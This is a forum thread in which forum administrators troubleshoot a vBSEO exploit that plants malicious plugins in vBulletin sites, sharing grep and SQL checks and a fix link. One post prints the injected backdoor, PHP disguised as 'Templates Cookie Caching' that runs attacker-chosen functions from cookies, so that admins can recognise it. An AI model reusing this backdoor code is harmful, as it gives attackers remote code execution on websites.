Tweet
Originally posted by bill preston
View Post
-
Is everyone else seeing this running vbseo? -
Does a search for functions_vbseocp_abstract.php turn up anything?Originally posted by AlpineZone View PostComment
-
Looking more, I'm on an old version of vbseo, 3.3.2, in reviewing the previous site owner's notes we had essentially pulled it out, although there are still active plugins in the system. I don't think it ever worked correctly for him previously, so I have kind of a hodgepodge of files.Comment
-
I've applied the fix that vBSEO recommends, but I'm wondering if that will address the SQL issue people are having here with "pluginlist". Yesterday I noticed a random plugin got installed with hacky looking code, which vBSEO says this their patch will fix, but does it fix the datastore issue too?Ken Iovino
Full Time PHP, Ruby and iOS DeveloperComment
-
Might be a dumb question but no clue how to search via FTPOriginally posted by bstillman View Post
Comment
-
Me neither. I use SSH.Originally posted by AlpineZone View PostMight be a dumb question but no clue how to search via FTPComment
-
AlpineZone, if you can connect to your server using SSH, you can do a search for the file using the 'locate' or 'grep' command.
If that doesn't work, you can search for a unique text that that file will only have, something like this: (do it in your forums root)Code:locate functions_vbseocp_abstract.php
If you're using an older version of vBSEO, then you're not going to find it. I remember they changed their filesystem a couple of years agoCode:grep -r "proc_deutf" *.php
Ken Iovino
Full Time PHP, Ruby and iOS DeveloperComment
-
Also thinking it could have ot do with simply the age of the install, since I'm on 3.3.2Comment
-
Go into your plugins and look for anything that looks weird... the exploit just adds some malicious plugins. Remove them, fix the exploit and you should be good to go.My main site: PUA ForumComment
-
Im having the same problem you guys are.. the SAME thing..millions of error emails.. etc..I am simply an admin.. I know how to manage the forum and add users etc.. nothing with settings etc as I had that alll done for me..what are we going to do to fix this? Is there any vbulletin moderators on here to help out with this obvious mass problem?Comment
-
Just so people know, you can quickly check if your site has been hit with vBSEO's exploit by running this mysql query:
If something does comes up, edit the hook via your plugin manager. You'll find some code that looks like this:Code:select title, hookname, phpcode from plugin where phpcode like "%vbauth%"
Remove it then apply the fix here:PHP Code:/* vBulletin Templates Cookie Caching */
$vbr="jnegaecq";$vbh="c33794aa91e3ec5bb71dd7a85f280d55";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
http://www.vbseo.com/f5/vbseo-securi...83/#post325546Ken Iovino
Full Time PHP, Ruby and iOS DeveloperComment
-
Shut your board down and apply this fix:Originally posted by downeastboat View Post
http://www.vbseo.com/f5/vbseo-securi...83/#post325546Ken Iovino
Full Time PHP, Ruby and iOS DeveloperComment
-
Ken, thanks for the help, I'm getting 0 hits on the query you provided above (select titel, hookname, etc.)
Also ran Grep and Locate and couldn't find any of those files. So I'm a bit lostComment
-
Specifically where do I go to change that code?Comment
-
Is there a specific plugin I can look at directly?Comment
Comment